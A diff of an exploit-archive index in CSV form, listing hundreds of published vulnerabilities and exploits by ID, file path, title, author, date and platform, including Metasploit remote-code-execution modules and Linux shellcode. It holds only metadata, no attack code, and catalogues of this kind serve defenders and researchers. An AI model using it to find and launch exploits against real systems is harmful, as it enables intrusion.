-35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 -35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Include Vulnerabilities",2011-02-01,"Yam Mesicka",php,webapps,0 +35282,platforms/android/remote/35282.rb,"Samsung Galaxy KNOX Android Browser RCE",2014-11-18,metasploit,android,remote,0 +35283,platforms/php/remote/35283.rb,"MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability",2014-11-18,metasploit,php,remote,80 35300,platforms/php/webapps/35300.txt,"WordPress TagNinja Plugin 1.0 - 'id' Parameter Cross-Site Scripting Vulnerability",2011-02-01,"AutoSec Tools",php,webapps,0 35301,platforms/php/webapps/35301.html,"Snowfox CMS 1.0 - CSRF Add Admin Exploit",2014-11-19,LiquidWorm,php,webapps,80 35302,platforms/linux/dos/35302.c,"MINIX 3.3.0 - Remote TCP/IP Stack DoS",2014-11-19,nitr0us,linux,dos,31337 @@ -31806,7 +31810,8 @@ id,file,description,date,author,platform,type,port 35310,platforms/asp/webapps/35310.txt,"Web Wiz Forums <= 9.5 - Multiple SQL Injection Vulnerabilities",2011-03-23,eXeSoul,asp,webapps,0 35311,platforms/php/webapps/35311.txt,"Octeth Oempro 3.6.4 SQL Injection and Information Disclosure Vulnerabilities",2011-02-03,"Ignacio Garrido",php,webapps,0 35312,platforms/php/webapps/35312.txt,"Firebook 'index.html' Cross-Site Scripting Vulnerability",2011-02-03,MustLive,php,webapps,0 -35313,platforms/php/webapps/35313.txt,"Wordpress SP Client Document Manager Plugin 2.4.1 - SQL Injection",2014-11-21,"ITAS Team",php,webapps,80 +35567,platforms/php/webapps/35567.txt,"Eleanor CMS Cross-Site Scripting and Multiple SQL Injection Vulnerabilities",2011-04-05,"High-Tech Bridge SA",php,webapps,0 +35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Include Vulnerability",2011-04-05,"High-Tech Bridge SA",php,webapps,0 35314,platforms/linux/remote/35314.txt,"Wireshark <= 1.4.3 - (.pcap) Memory Corruption Vulnerability",2011-02-03,"Huzaifa Sidhpurwala",linux,remote,0 35315,platforms/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' Parameter SQL Injection Vulnerability",2011-02-07,NoNameMT,php,webapps,0 35316,platforms/multiple/remote/35316.sh,"SMC Networks SMCD3G Session Management Authentication Bypass Vulnerability",2011-02-04,"Zack Fasel and Matthew Jakubowski",multiple,remote,0 @@ -31814,11 +31819,13 @@ id,file,description,date,author,platform,type,port 35318,platforms/windows/remote/35318.c,"Cain & Abel 2.7.3 - 'dagc.dll' DLL Loading Arbitrary Code Execution Vulnerability",2011-02-07,d3c0der,windows,remote,0 35319,platforms/php/webapps/35319.txt,"WebAsyst Shop-Script Cross-Site Scripting and HTML Injection Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35320,platforms/php/webapps/35320.txt,"ViArt Shop 4.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 +35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - CSRF Vulnerability",2014-11-26,"High-Tech Bridge SA",php,webapps,80 35322,platforms/windows/local/35322.txt,"Privacyware Privatefirewall 7.0 - Unquoted Service Path Privilege Escalation",2014-11-22,LiquidWorm,windows,local,0 35323,platforms/php/webapps/35323.md,"MyBB <= 1.8.2 - unset_globals() Function Bypass and Remote Code Execution Vulnerability",2014-11-22,"Taoguang Chen",php,webapps,0 35324,platforms/php/webapps/35324.txt,"Wordpress CM Download Manager Plugin 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps,0 35325,platforms/hardware/webapps/35325.txt,"Netgear Wireless Router WNR500 - Parameter Traversal Arbitrary File Access Exploit",2014-11-22,LiquidWorm,hardware,webapps,0 35326,platforms/windows/dos/35326.cpp,"Microsoft Windows - Win32k.sys Denial of Service",2014-11-22,Kedamsky,windows,dos,0 +35380,platforms/php/remote/35380.rb,"Pandora Fms SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80 35327,platforms/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps,0 35328,platforms/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps,0 35329,platforms/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting Vulnerability",2011-02-09,MustLive,php,webapps,0 @@ -31842,7 +31849,7 @@ id,file,description,date,author,platform,type,port 35347,platforms/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Parameter Cross-Site Scripting Vulnerability",2011-02-12,"AutoSec Tools",php,webapps,0 35348,platforms/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps,0 35349,platforms/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 -35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting, HTML Injection and Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 +35350,platforms/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting_ HTML Injection and Information Disclosure Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35351,platforms/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps,0 35352,platforms/multiple/remote/35352.rb,"Ruby on Rails 3.0.5 - 'WEBrick::HTTPRequest' Module HTTP Header Injection Vulnerability",2011-02-16,"Jimmy Bandit",multiple,remote,0 35353,platforms/php/webapps/35353.txt,"GetSimple CMS 2.03 - 'admin/upload-ajax.php' Remote Arbitrary File Upload Vulnerability",2011-02-15,"s3rg3770 and Chuzz",php,webapps,0 @@ -31856,7 +31863,7 @@ id,file,description,date,author,platform,type,port 35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Include and Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF",2014-11-25,LiquidWorm,windows,dos,0 35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS",2011-02-21,"Dave Daly",multiple,remote,0 -35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 - (dosearch.php, words_exact param) SQL Injection",2014-11-25,bard,php,webapps,80 +35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 - (dosearch.php words_exact param) SQL Injection",2014-11-25,bard,php,webapps,80 35366,platforms/multiple/remote/35366.txt,"IBM Lotus Sametime stconf.nsf XSS",2011-02-21,"Dave Daly",multiple,remote,0 35367,platforms/php/webapps/35367.txt,"crea8social 1.3 - Stored XSS Vulnerability",2014-11-25,"Halil Dalabasmaz",php,webapps,80 35369,platforms/multiple/dos/35369.txt,"Battlefield 2/2142 Malformed Packet NULL Pointer Dereference Remote Denial Of Service Vulnerability",2011-02-22,"Luigi Auriemma",multiple,dos,0 @@ -31870,19 +31877,17 @@ id,file,description,date,author,platform,type,port 35377,platforms/windows/local/35377.rb,"Mini-stream RM-MP3 Converter 3.1.2.1.2010.03.30 - (.wax) SEH Buffer Overflow",2014-11-26,"Muhamad Fadzil Ramli",windows,local,0 35378,platforms/php/webapps/35378.txt,"Wordpress DB Backup Plugin - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 35379,platforms/windows/dos/35379.go,"Elipse E3 HTTP Denial of Service",2014-11-26,firebitsbr,windows,dos,80 -35380,platforms/php/remote/35380.rb,"Pandora Fms SQLi Remote Code Execution",2014-11-26,metasploit,php,remote,80 -35381,platforms/php/webapps/35381.txt,"xEpan 1.0.1 - CSRF Vulnerability",2014-11-26,"High-Tech Bridge SA",php,webapps,80 35382,platforms/android/dos/35382.txt,"Android WAPPushManager - SQL Injection",2014-11-26,"Baidu X-Team",android,dos,0 35383,platforms/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 Traceroute Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 35384,platforms/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 Ping Command Injection",2014-11-26,"Brandon Perry",cgi,webapps,80 35385,platforms/php/webapps/35385.pl,"Wordpress Plugin Slider Revolution 3.0.95 /Showbiz Pro 1.7.1 - Shell Upload Exploit",2014-11-26,"Simo Ben Youssef",php,webapps,80 35386,platforms/linux/remote/35386.txt,"Logwatch Log File Special Characters Local Privilege Escalation Vulnerability",2011-02-24,"Dominik George",linux,remote,0 35387,platforms/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Parameter Cross-Site Scripting Vulnerability",2011-02-25,"Aung Khant",php,webapps,0 +35395,platforms/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement <= 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",windows,local,0 35391,platforms/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 - 'users.php' SQL Injection Vulnerability",2011-02-25,H3X,php,webapps,0 35392,platforms/php/webapps/35392.txt,"WordPress IGIT Posts Slider Widget Plugin 1.0 - 'src' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35393,platforms/php/webapps/35393.txt,"WordPress ComicPress Manager Plugin 1.4.9 - 'lang' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 35394,platforms/php/webapps/35394.txt,"WordPress YT-Audio Plugin 1.7 - 'v' Parameter Cross-Site Scripting Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 -35395,platforms/windows/local/35395.txt,"CCH Wolters Kluwer PFX Engagement <= 7.1 - Local Privilege Escalation",2014-11-28,"Information Paradox",windows,local,0 35396,platforms/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerability",2014-11-28,"Parikesit , Kurawa",php,webapps,0 35397,platforms/php/webapps/35397.txt,"Drupal Cumulus Module 5.X-1.1/6.X-1.4 - 'tagcloud' Parameter Cross-Site Scripting Vulnerability",2011-02-23,MustLive,php,webapps,0 35398,platforms/multiple/remote/35398.pl,"KMPlayer 2.9.3.1214 - (.ksf) Remote Buffer Overflow Vulnerability",2011-02-28,KedAns-Dz,multiple,remote,0 @@ -31912,6 +31917,7 @@ id,file,description,date,author,platform,type,port 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0 35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0 +36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0 @@ -31933,6 +31939,7 @@ id,file,description,date,author,platform,type,port 35445,platforms/linux/dos/35445.txt,"OpenLDAP 2.4.x - 'modrdn' NULL OldDN Remote Denial of Service Vulnerability",2011-01-03,"Serge Dubrouski",linux,dos,0 35446,platforms/windows/remote/35446.pl,"Windows Movie Maker 2.1.4026 - (.avi) Remote Buffer Overflow Vulnerability",2011-03-10,KedAns-Dz,windows,remote,0 35447,platforms/php/webapps/35447.txt,"Google Document Embedder 2.5.16 - mysql_real_escpae_string bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0 +35474,platforms/windows/remote/35474.py,"Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 35449,platforms/windows/local/35449.rb,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-12-03,"Muhamad Fadzil Ramli",windows,local,0 35450,platforms/linux/local/35450.txt,"VFU 4.10-1.1 - Buffer Overflow",2014-12-03,"Juan Sacco",linux,local,0 35451,platforms/php/webapps/35451.txt,"BoutikOne categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 @@ -31944,6 +31951,8 @@ id,file,description,date,author,platform,type,port 35457,platforms/php/webapps/35457.txt,"BoutikOne rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0 35459,platforms/php/webapps/35459.txt,"Cart66 Lite WordPress Ecommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 35460,platforms/php/webapps/35460.txt,"CodeArt Google MP3 Player Wordpress Plugin - File Disclosure Download",2014-12-03,"QK14 Team",php,webapps,80 +35564,platforms/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 +35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS - 1.0 - Cross-Site Scripting and SQL Injection Vulnerabilities",2011-04-04,"kurdish hackers team",php,webapps,0 35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability",2014-12-04,"Robert Cooper",cgi,webapps,80 35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass Vulnerability",2011-03-14,"DcLabs Security Research Group",multiple,remote,0 @@ -31955,7 +31964,6 @@ id,file,description,date,author,platform,type,port 35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection Vulnerability",2011-03-16,H3X,php,webapps,0 35472,platforms/lin_amd64/local/35472.txt,"Offset2lib: Bypassing Full ASLR On 64 bit Linux",2014-12-05,"Packet Storm",lin_amd64,local,0 35473,platforms/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80 -35474,platforms/windows/remote/35474.py,"Windows Kerberos - Elevation of Privilege (MS14-068)",2014-12-05,"Sylvain Monne",windows,remote,0 35475,platforms/php/webapps/35475.txt,"WordPress Sodahead Polls Plugin 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps,0 35476,platforms/php/webapps/35476.txt,"WordPress Rating-Widget Plugin 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps,0 35477,platforms/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 @@ -31972,9 +31980,9 @@ id,file,description,date,author,platform,type,port 35488,platforms/osx/local/35488.c,"Apple Mac OS X 10.6.x HFS Subsystem Information Disclosure Vulnerability",2011-03-21,"Dan Rosenberg",osx,local,0 35489,platforms/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Function Remote Denial of Service Vulnerability",2011-03-23,"Vladimir Perepelitsa",multiple,dos,0 35490,platforms/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps,0 -35491,platforms/php/webapps/35491.txt,"PBBoard CMS - Stored XSS Vulnerability",2014-12-08,"Manish Tanwar",php,webapps,0 35492,platforms/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection Vulnerability",2014-12-08,BarrabravaZ,php,webapps,0 35493,platforms/php/webapps/35493.txt,"Wordpress Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps,0 +35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 @@ -31984,6 +31992,11 @@ id,file,description,date,author,platform,type,port 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 - (.rmp) Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,multiple,remote,0 35502,platforms/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service Vulnerability",2011-03-27,KedAns-Dz,windows,dos,0 35503,platforms/windows/local/35503.rb,"Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow",2014-12-09,"Muhamad Fadzil Ramli",windows,local,0 +35672,platforms/jsp/webapps/35672.txt,"Cisco Unified Communications Manager <= 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injection Vulnerabilities",2011-04-27,"Alberto Revelli",jsp,webapps,0 +35673,platforms/php/webapps/35673.txt,"WordPress Daily Maui Photo Widget Plugin 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35674,platforms/php/webapps/35674.txt,"WordPress WP Photo Album Plugin 1.5.1 - 'id' Parameter Cross-Site Scripting Vulnerability",2011-04-28,"High-Tech Bridge SA",php,webapps,0 +35675,platforms/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",php,webapps,0 +35676,platforms/cgi/webapps/35676.txt,"BackupPC 3.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",cgi,webapps,0 35505,platforms/php/webapps/35505.txt,"Wordpress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 @@ -31991,12 +32004,14 @@ id,file,description,date,author,platform,type,port 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - (.fp4f) Remote Buffer Overflow Vulnerability",2011-03-27,KedAns-Dz,windows,remote,0 35510,platforms/php/webapps/35510.txt,"Humhub <= 0.10.0-rc.1 - SQL Injection Vulnerability",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35511,platforms/php/webapps/35511.txt,"Humhub <= 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 +35558,platforms/php/webapps/35558.txt,"PHP-Fusion 'articles.php' Cross-Site Scripting Vulnerability",2011-04-02,KedAns-Dz,php,webapps,0 +35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0 35513,platforms/linux/remote/35513.py,"Apache James Server 2.3.2 - Remote Command Execution",2014-12-10,"Jakub Palaczynski",linux,remote,4555 35514,platforms/php/webapps/35514.txt,"OrangeHRM 2.6.2 - 'jobVacancy.php' Cross-Site Scripting Vulnerability",2011-03-27,"AutoSec Tools",php,webapps,0 35515,platforms/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps,0 35516,platforms/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Parameter Local File Include Vulnerability",2011-03-28,eidelweiss,php,webapps,0 35517,platforms/php/webapps/35517.txt,"pppBLOG 0.3 - 'search.php' Cross-Site Scripting Vulnerability",2011-03-28,"kurdish hackers team",php,webapps,0 -35518,platforms/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injection Vulnerabilities",2014-12-10,Portcullis,php,webapps,80 +35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection Vulnerability",2011-04-04,KedAns-Dz,php,webapps,0 35519,platforms/linux/shellcode/35519.txt,"Linux x86 rmdir - 37 bytes Stack shellcode",2014-12-11,kw4,linux,shellcode,0 35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting and Multiple Local File Include Vulnerabilities",2011-03-29,"AutoSec Tools",php,webapps,0 @@ -32011,33 +32026,25 @@ id,file,description,date,author,platform,type,port 35531,platforms/windows/local/35531.py,"Mediacoder 0.8.33 build 5680 - SEH Buffer Overflow Exploit DoS (.lst)",2014-12-15,s-dz,windows,local,0 35532,platforms/windows/local/35532.py,"jaangle 0.98i.977 - Denial of Service Vulnerability",2014-12-15,s-dz,windows,local,0 35533,platforms/php/webapps/35533.py,"Wordpress Download Manager 2.7.4 - Remote Code Execution Vulnerability",2014-12-15,"Claudio Viviani",php,webapps,0 +35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection Vulnerability",2011-03-31,"High-Tech Bridge SA",php,webapps,0 35535,platforms/php/webapps/35535.php,"PHPads <= 213607 - Authentication Bypass / Password Change Exploit",2014-12-15,"Shaker msallm",php,webapps,0 35539,platforms/php/dos/35539.txt,"phpMyAdmin 4.0.x / 4.1.x / 4.2.x - DoS",2014-12-15,"Javer Nieto and Andres Rojas",php,dos,0 -35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 -35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0 -35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80 -35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection Vulnerability",2011-03-30,RoAd_KiLlEr,php,webapps,0 -35548,platforms/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' Parameter HTML Injection Vulnerability",2011-03-31,"High-Tech Bridge SA",php,webapps,0 -35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,metasploit,unix,remote,80 -35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 -35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rsemann",php,webapps,80 -35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - (.avi) Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 -35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - (.avi) File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 -35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0 -35555,platforms/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting Vulnerability",2011-04-01,"Antu Sanadi",php,webapps,0 -35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution",2014-12-17,Chako,hardware,webapps,0 -35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection Vulnerability",2011-04-04,KedAns-Dz,php,webapps,0 -35558,platforms/php/webapps/35558.txt,"PHP-Fusion 'articles.php' Cross-Site Scripting Vulnerability",2011-04-02,KedAns-Dz,php,webapps,0 -35559,platforms/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Security Vulnerabilities",2011-04-04,MustLive,php,webapps,0 35560,platforms/windows/remote/35560.txt,"RealNetworks GameHouse 'InstallerDlg.dll' 2.6.0.445 - ActiveX Control Multiple Vulnerabilities",2011-04-03,rgod,windows,remote,0 35561,platforms/php/webapps/35561.txt,"WPwizz AdWizz Plugin 1.0 - 'link' Parameter Cross-Site Scripting Vulnerability",2011-04-04,"John Leitch",php,webapps,0 35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 - 'ajax_action' Parameter Cross-Site Scripting Vulnerability",2011-04-03,"John Leitch",php,webapps,0 35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 - 'index.php' Arbitrary File Download Vulnerability",2011-04-03,KedAns-Dz,windows,remote,0 -35564,platforms/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 -35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS - 1.0 - Cross-Site Scripting and SQL Injection Vulnerabilities",2011-04-04,"kurdish hackers team",php,webapps,0 -35566,platforms/php/webapps/35566.txt,"Yaws-Wiki 1.88-1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2011-04-04,"Michael Brooks",php,webapps,0 -35567,platforms/php/webapps/35567.txt,"Eleanor CMS Cross-Site Scripting and Multiple SQL Injection Vulnerabilities",2011-04-05,"High-Tech Bridge SA",php,webapps,0 -35568,platforms/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Include Vulnerability",2011-04-05,"High-Tech Bridge SA",php,webapps,0 +35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 +35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution",2014-12-17,Chako,hardware,webapps,0 +35543,platforms/php/webapps/35543.txt,"Wordpress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0 +35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,metasploit,unix,remote,80 +35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,metasploit,php,remote,80 +35547,platforms/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' Parameter SQL Injection Vulnerability",2011-03-30,RoAd_KiLlEr,php,webapps,0 +35550,platforms/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps,0 +35551,platforms/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Stored XSS",2014-12-16,"Steffen Rösemann",php,webapps,80 +35552,platforms/windows/dos/35552.py,"MoviePlay 4.82 - (.avi) Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 +35553,platforms/windows/dos/35553.pl,"Microsoft Windows Media Player 11.0.5721.5145 - (.avi) File Buffer Overflow Vulnerability",2011-03-31,^Xecuti0N3r,windows,dos,0 +35554,platforms/linux/remote/35554.txt,"Perl 5.x - 'lc()' and 'uc()' Functions TAINT Mode Protection Security Bypass Weakness",2011-03-30,mmartinec,linux,remote,0 +35555,platforms/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting Vulnerability",2011-04-01,"Antu Sanadi",php,webapps,0 35569,platforms/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Include Vulnerabilities",2011-04-04,KedAns-Dz,php,webapps,0 35570,platforms/multiple/remote/35570.txt,"python-feedparser 5.0 - 'feedparser/feedparser.py' Cross-Site Scripting Vulnerability",2011-04-05,fazalmajid,multiple,remote,0 35571,platforms/php/webapps/35571.txt,"TextPattern 4.2 - 'index.php' Cross-Site Scripting Vulnerability",2011-04-06,"kurdish hackers team",php,webapps,0 @@ -32054,14 +32061,13 @@ id,file,description,date,author,platform,type,port 35582,platforms/php/webapps/35582.txt,"ProjectSend r561 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35583,platforms/php/webapps/35583.txt,"Piwigo 2.7.2 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 35584,platforms/php/webapps/35584.txt,"GQ File Manager 0.2.5 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 +35586,platforms/lin_x86-64/shellcode/35586.c,"x64 Linux bind TCP port shellcode (81 bytes_ 96 with password)",2014-12-22,"Sean Dillon",lin_x86-64,shellcode,0 35585,platforms/php/webapps/35585.txt,"Codiad 2.4.3 - Multiple Vulnerabilities",2014-12-19,TaurusOmar,php,webapps,80 